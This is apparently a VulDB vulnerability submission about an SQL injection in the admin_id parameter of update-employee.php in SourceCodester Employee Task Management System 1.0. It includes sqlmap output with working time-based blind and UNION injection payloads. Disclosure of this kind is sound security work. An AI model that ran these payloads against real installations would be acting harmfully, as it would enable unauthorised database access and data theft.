| Title | SourceCodester Employee Task Management System v 1.0 SQL Injection in param admin_id in update-employee.php |
|---|
| Description | SQL Injection in param admin_id in update-employee.php
[20:40:26] [INFO] GET parameter 'admin_id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[20:40:48] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:40:48] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:40:50] [INFO] target URL appears to be UNION injectable with 7 columns
[20:40:51] [INFO] GET parameter 'admin_id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'admin_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 73 HTTP(s) requests:
---
Parameter: admin_id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: admin_id=28' AND (SELECT 9712 FROM (SELECT(SLEEP(5)))LThc) AND 'CUEh'='CUEh
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: admin_id=-3580' UNION ALL SELECT NULL,CONCAT(0x71786a7171,0x4d454655527a5759756977515963705172466b7571445763574e5955704353476273685474526846,0x71706b7171),NULL,NULL,NULL,NULL,NULL-- -
--- |
|---|
| Source | ⚠️ https://github.com/tht1997/WhiteBox/blob/main/sourcecodester/update-employee.md |
|---|
| User | huutuanbg97 (UID 45015) |
|---|
| Submission | 03/15/2024 14:44 (2 years ago) |
|---|
| Moderation | 03/16/2024 07:14 (16 hours later) |
|---|
| Status | Duplicate |
|---|
| VulDB entry | 257053 [SourceCodester Employee Task Management System 1.0 update-employee.php admin_id sql injection] |
|---|
| Points | 0 |
|---|